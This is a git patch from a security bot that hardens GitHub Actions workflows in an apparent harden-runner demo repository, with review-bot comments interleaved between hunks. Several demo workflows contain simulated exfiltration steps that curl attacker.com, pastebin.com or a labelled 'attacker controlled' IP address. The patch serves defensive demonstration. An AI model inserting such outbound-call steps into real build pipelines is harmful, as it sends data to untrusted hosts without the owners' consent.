From b1835d700bf7bb331ffc45cfe0e8636f10b1d3f3 Mon Sep 17 00:00:00 2001
From: "stepsecurity-int[bot]" <185740846+stepsecurity-int[bot]@users.noreply.github.com>
Date: Thu, 5 Jun 2025 15:25:02 +0000
Subject: [PATCH] Apply security best practices

Signed-off-by: StepSecurity Bot
---
 .github/workflows/PRTargetWorkflow.yml | 9 +++++++++
 .github/workflows/anomalous-outbound-calls.yaml | 6 +++++-
 .github/workflows/arc-codecov-simulation.yml | 4 ++--
 .github/workflows/arc-secure-by-default.yml | 16 ++++++++++++++++
 .github/workflows/arc-solarwinds-simulation.yml | 7 ++++++-
 .../workflows/arc-zero-effort-observability.yml | 7 ++++++-
 .github/workflows/baseline_checks.yml | 8 ++++----
 .github/workflows/block-dns-exfiltration.yaml | 6 +++++-
 .../changed-files-vulnerability-with-hr.yml | 4 ++--
 .../changed-files-vulnerability-without-hr.yml | 7 ++++++-
 .../workflows/hosted-file-monitor-with-hr.yml | 6 +++---
 .../workflows/hosted-file-monitor-without-hr.yml | 9 +++++++--
 .github/workflows/hosted-https-monitoring-hr.yml | 9 +++++++--
 .../workflows/hosted-network-filtering-hr.yml | 10 +++++-----
 .../workflows/hosted-network-monitoring-hr.yml | 6 +++---
 .github/workflows/hosted-network-without-hr.yml | 11 ++++++++---
 .github/workflows/publish.yml | 4 ++--
 .github/workflows/secret-in-build-log.yml | 6 +++++-
 .../self-hosted-file-monitor-with-hr.yml | 7 ++++++-
 .../self-hosted-network-filtering-hr.yml | 4 ++--
 .../self-hosted-network-monitoring-hr.yml | 7 ++++++-
 .../tj-actions-changed-files-incident.yaml | 4 ++--
 .github/workflows/toc-tou.yml | 10 ++++++++++
 .github/workflows/unexpected-outbound-calls.yml | 6 +++++-
 24 files changed, 132 insertions(+), 41 deletions(-)

diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml
index 8bf0debd9..c0024b4b8 100644
--- a/.github/workflows/PRTargetWorkflow.yml
+++ b/.github/workflows/PRTargetWorkflow.yml
@@ -7,11 +7,20 @@ on: - synchronize - reopened +permissions: {} + jobs: pr-target-check: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - name: Check out code uses: actions/checkout@v4 diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml index 2e87a976c..1d42876fb 100644 --- a/.github/workflows/anomalous-outbound-calls.yaml +++ b/.github/workflows/anomalous-outbound-calls.yaml @@ -1,13 +1,17 @@ name: Anomalous Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: AnomalousOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://pastebin.com -L || true" diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml index dd1ab7dc9..e085e2440 100644 --- a/.github/workflows/arc-codecov-simulation.yml +++ b/.github/workflows/arc-codecov-simulation.yml @@ -7,7 +7,7 @@ jobs: runs-on: self-hosted steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -28,7 +28,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} 
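Review bot: `actions/checkout@v4`, the last step in the hunk, is left at a mutable tag while every third-party action in this commit was pinned to a commit SHA; pin it the same way (`uses: actions/checkout@<release-sha> # v4.x.y`, with the real SHA and tag) so the workflow's trust no longer rests on tag integrity. The file name suggests a `pull_request_target` trigger, but the trigger keyword and any `ref:` given to checkout sit above the hunk, so whether an untrusted PR head is checked out alongside the repository token cannot be confirmed from here and should be checked separately — a SHA pin does not address that. `egress-policy: audit` records outbound calls but does not stop them; once the baseline is known, `block` with an `allowed-endpoints` list is the enforcing configuration.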
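Review bot: The job-level `contents: read` added under `unexpected-outbound-calls:` grants more than the job uses: the hunk spans the whole job, and its only steps are harden-runner and a `curl`, with no `actions/checkout`. With `permissions: {}` now at the top of the file, omitting the job-level `permissions:` block (or writing `permissions: {}` there) leaves the token empty, which is the least-privilege result. If harden-runner's audit mode does need the token for something, record that in a trailing comment the way the other files justify their grants (`contents: read # for actions/checkout to fetch code`).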
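Review bot: The pin comment `# v5` on `elgohr/Publish-Docker-Github-Action@4feac4d5…` names a floating major tag rather than the release the SHA belongs to, so a reader cannot verify what is actually pinned and tools that read the comment to track updates have no exact version to work from; write the specific tag the commit carries (a `v5.x.y`), as was done with `# v2.12.0` and `# v4.2.0` elsewhere in this patch. The same `# v5` comment is repeated on every Publish step in the patch and should be corrected in all of them. The credential used by this step is below the hunk, so whether it is `GITHUB_TOKEN` — which would need `packages: write` once a top-level `permissions: {}` is introduced — cannot be confirmed here.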
diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml index 96a7098dc..b96c675e2 100644 --- a/.github/workflows/arc-secure-by-default.yml +++ b/.github/workflows/arc-secure-by-default.yml @@ -2,18 +2,34 @@ name: "ARC: Secure-By-Default Cluster-Level Policy" on: workflow_dispatch: +permissions: {} + jobs: direct-ip-hosted: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address run: curl 104.16.209.12 --connect-timeout 5 direct-ip-arc: + permissions: + contents: read # for actions/checkout to fetch code runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml index 72ce7c177..707b11511 100644 --- a/.github/workflows/arc-solarwinds-simulation.yml +++ b/.github/workflows/arc-solarwinds-simulation.yml @@ -6,6 +6,11 @@ jobs: arc-solarwinds-simulation: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
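Review bot: The `direct-ip-arc` job runs on `self-hosted` under a workflow titled "Cluster-Level Policy", and harden-runner's ARC deployment applies policy from the cluster rather than from a per-job step, so the audit step inserted there may be redundant or ineffective — confirm against the harden-runner ARC documentation before counting it as coverage. Both jobs still use `actions/checkout@v3`, an older major at a mutable tag, while other files in this same commit use `@v4`; pinning it to a release SHA (`uses: actions/checkout@<release-sha> # v4.x.y`) would bring the GitHub-owned actions in line with the third-party pins. The `curl 104.16.209.12` lines are the intended demo payload and should stay as they are.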
@@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml index 5cb8daacc..b9c6fb1f3 100644 --- a/.github/workflows/arc-zero-effort-observability.yml +++ b/.github/workflows/arc-zero-effort-observability.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml index 06fc0bc75..385ae72e3 100644 --- a/.github/workflows/baseline_checks.yml +++ b/.github/workflows/baseline_checks.yml @@ -7,11 +7,11 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@int-sh + - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 
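Review bot: `step-security/harden-runner@668ad3cc… # int-sh` pins to a commit on a branch rather than a release: the comment names `int-sh` instead of a tag, so nothing ties the SHA to a published version and release-tracking tooling will not update it, whereas every other workflow in this patch uses `0634a267… # v2.12.0`. If this workflow is meant to exercise an integration build, say so on the step (`# integration build of harden-runner, intentionally not a release`) so the next pinning pass does not "correct" it; otherwise align it with v2.12.0. In the same hunk `crazy-max/ghaction-github-status` is now pinned but `actions/checkout@v3` remains a mutable tag.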
@@ -22,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml index 767d5d981..f007045d5 100644 --- a/.github/workflows/block-dns-exfiltration.yaml +++ b/.github/workflows/block-dns-exfiltration.yaml @@ -1,13 +1,17 @@ name: Block DNS Exfiltration With Harden-Runner on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code name: Deploy runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: | diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml index d8ed7379f..29f4de01d 100644 --- a/.github/workflows/changed-files-vulnerability-with-hr.yml +++ b/.github/workflows/changed-files-vulnerability-with-hr.yml @@ -15,7 +15,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block @@ -29,7 +29,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | 
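Review bot: Replacing `martinbeentjes/npm-get-version-action@v1.3.1` with `step-security/npm-get-version-action@93736530… # v1.3.1` changes who publishes the code, not just how it is pinned: the SHA lives in a fork and `# v1.3.1` is the fork's tag, yet the commit message ("Apply security best practices") does not mention a publisher change. A fork swap warrants a sentence in the commit body naming the fork and the reason, and a step comment such as `# StepSecurity-maintained fork of martinbeentjes/npm-get-version-action` so the change is auditable later. The `with: path:` input is unchanged, but the outputs read further down the file are outside the hunk and cannot be checked here.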
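Review bot: `tj-actions/changed-files@v40` → `step-security/changed-files@95b56dad… # v46.0.5` jumps six majors and changes publisher in one step, and its outputs are consumed by the `List all changed files` `run:` block that begins at the end of the hunk and continues below it; re-check that block against the action's release notes for v41–v46 before merging, as major bumps of this action may have changed output names or defaults (the consuming script is not visible here). The file name pairs this workflow with the `tj-actions-changed-files-incident.yaml` demo, so a comment above the step (`# replaced tj-actions/changed-files with the StepSecurity fork; see the incident workflow`) would record why the action under test changed.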
diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml index 4b74464f1..fd0182d7a 100644 --- a/.github/workflows/changed-files-vulnerability-without-hr.yml +++ b/.github/workflows/changed-files-vulnerability-without-hr.yml @@ -14,6 +14,11 @@ jobs: runs-on: ubuntu-latest name: Test changed-files steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml index eeb3b63f6..1bae8efb2 100644 --- a/.github/workflows/hosted-file-monitor-with-hr.yml +++ b/.github/workflows/hosted-file-monitor-with-hr.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit @@ -17,13 +17,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml index a673fca8c..bd31620a2 100644 
--- a/.github/workflows/hosted-file-monitor-without-hr.yml +++ b/.github/workflows/hosted-file-monitor-without-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - name: npm install @@ -13,13 +18,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml index 379884875..d0b9027ee 100644 --- a/.github/workflows/hosted-https-monitoring-hr.yml +++ b/.github/workflows/hosted-https-monitoring-hr.yml @@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner" on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for JasonEtco/create-an-issue to read template files + issues: write # for JasonEtco/create-an-issue to create new issues runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - uses: actions/checkout@v3 - - uses: JasonEtco/create-an-issue@v2 + - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml index 7dd7dcbfa..b85edd8e6 100644 --- a/.github/workflows/hosted-network-filtering-hr.yml 
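Review bot: The job now hands a `GITHUB_TOKEN` carrying `issues: write` to a third-party action while harden-runner stays in `egress-policy: audit`, which records but does not constrain where that token can be sent; pinning `JasonEtco/create-an-issue` to a SHA narrows the risk, and `block` with `api.github.com:443` in `allowed-endpoints` would contain it, unless audit mode is the point of this monitoring demo. The per-permission comments (`# for JasonEtco/create-an-issue to create new issues`) are the right pattern and worth keeping. `actions/checkout@v3` between the two pinned steps is still a mutable tag.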
+++ b/.github/workflows/hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block @@ -17,7 +17,7 @@ jobs: registry.npmjs.org:443 www.githubstatus.com:443 - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -28,17 +28,17 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml index 0aa554773..e82cfa569 100644 --- a/.github/workflows/hosted-network-monitoring-hr.yml +++ b/.github/workflows/hosted-network-monitoring-hr.yml @@ -10,7 +10,7 @@ jobs: with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 
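Review bot: With `egress-policy: block` and `disable-sudo: true` set in the first hunk, the `Publish to Registry` step at the end of this hunk only succeeds if the registry it pushes `${{ github.repository }}/prod:latest` to is in `allowed-endpoints`; the visible part of that list (`registry.npmjs.org:443`, `www.githubstatus.com:443`) starts above the second hunk, so the registry entry cannot be confirmed from here and should be checked, as a miss fails closed at push time. The newly pinned `step-security/npm-get-version-action` and `step-security/semver-utils` steps make no network calls that are visible in the hunk, so they should not need new endpoints.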
@@ -21,12 +21,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml index 3533b8c72..e0c9b7dc5 100644 --- a/.github/workflows/hosted-network-without-hr.yml +++ b/.github/workflows/hosted-network-without-hr.yml @@ -6,7 +6,12 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: crazy-max/ghaction-github-status@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -17,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index f42852631..3c78896d1 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml 
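Review bot: This file is named `hosted-network-without-hr.yml`, which reads as the control half of a with/without Harden-Runner comparison, and the hunk inserts a harden-runner step into it, so the pair now differs only in egress-policy details rather than in the presence of the agent. The same happened to `hosted-file-monitor-without-hr.yml` and `changed-files-vulnerability-without-hr.yml` in this patch. If the "without" workflows are meant to stay unhardened for the demo, drop the inserted step and add a comment at the top of the job (`# control workflow: intentionally runs without harden-runner`) so automated hardening passes skip it; if the comparison is no longer wanted, rename the files so the names match their content.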
@@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - uses: actions/checkout@v3 @@ -15,7 +15,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml index 847c1ca10..b783f9a48 100644 --- a/.github/workflows/secret-in-build-log.yml +++ b/.github/workflows/secret-in-build-log.yml @@ -3,15 +3,19 @@ name: Secret in Build Log on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: harden-runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml index a53608566..5e04911ab 100644 --- a/.github/workflows/self-hosted-file-monitor-with-hr.yml +++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
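Review bot: `publish.yml` pushes `${{ github.repository }}/prod:latest` as `${{ github.actor }}` but, unlike several sibling files in this commit, receives no top-level `permissions: {}` in either hunk; the head of the file is outside both hunks, so it may already have one, and if it does not the job runs with the repository's default token scope. If the password below the hunk is `GITHUB_TOKEN`, add `permissions: {}` at the top and `permissions: { contents: read, packages: write }` on the `build` job, each with a justifying comment as done elsewhere in this patch. `actions/checkout@v3` in the first hunk is still a mutable tag.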
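Review bot: In `secret-in-build-log.yml` the `actions/checkout@v3` step still runs before the `harden-runner` step; harden-runner's documentation says it must be the first step of the job so that everything after it — including checkout's network activity and file writes — is observed, and this commit re-pinned the step without moving it. Move `- name: harden-runner` (with its `uses:` and `with:` lines) above `- uses: actions/checkout@v3`, as the other workflows in this patch do. The job-level `contents: read # for actions/checkout to fetch code` is correctly scoped and justified.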
@@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml index 815f293ea..4e3090063 100644 --- a/.github/workflows/self-hosted-network-filtering-hr.yml +++ b/.github/workflows/self-hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: [self-hosted, ec2] steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -24,7 +24,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml index 5f0ba2320..ee807de05 100644 --- a/.github/workflows/self-hosted-network-monitoring-hr.yml +++ b/.github/workflows/self-hosted-network-monitoring-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
@@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml index 7426c56fb..4f05cf1d3 100644 --- a/.github/workflows/tj-actions-changed-files-incident.yaml +++ b/.github/workflows/tj-actions-changed-files-incident.yaml @@ -14,7 +14,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: audit @@ -26,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v35 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml index 50ca25cb9..9fcb13fd2 100644 --- a/.github/workflows/toc-tou.yml +++ b/.github/workflows/toc-tou.yml @@ -15,6 +15,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes @@ -40,6 +45,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes 
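Review bot: This file is named `tj-actions-changed-files-incident.yaml` and ran `tj-actions/changed-files@v35` with harden-runner in `audit` mode, which reads as a reproduction of the incident it is named after; replacing that reference with `step-security/changed-files@95b56dad… # v46.0.5` removes the subject of the demonstration. If the workflow is a reproduction, keep the original reference and mark it (`# intentionally references tj-actions/changed-files for the incident demo; do not auto-pin`) so hardening passes skip it; if it is meant to show the remediation instead, rename or re-describe it so name and content agree. The `List all changed files` `run:` block that consumes the outputs starts at the end of the hunk and continues below it, and v35 → v46.0.5 crosses many majors.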
diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml index f53167970..83bba8d0d 100644 --- a/.github/workflows/unexpected-outbound-calls.yml +++ b/.github/workflows/unexpected-outbound-calls.yml @@ -1,13 +1,17 @@ name: Unexpected Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: UnexpectedOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://attacker.com -L || true"
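Review bot: The job-level `contents: read` under `unexpected-outbound-calls:` grants a permission nothing in the job uses — the hunk covers the whole job and its steps are harden-runner and `curl https://attacker.com -L || true`, with no checkout. With `permissions: {}` at the top of the file, omitting the job-level block or writing `permissions: {}` leaves the token empty; if harden-runner needs the token, justify it with a trailing comment. The same over-grant appears in `anomalous-outbound-calls.yaml` in this patch.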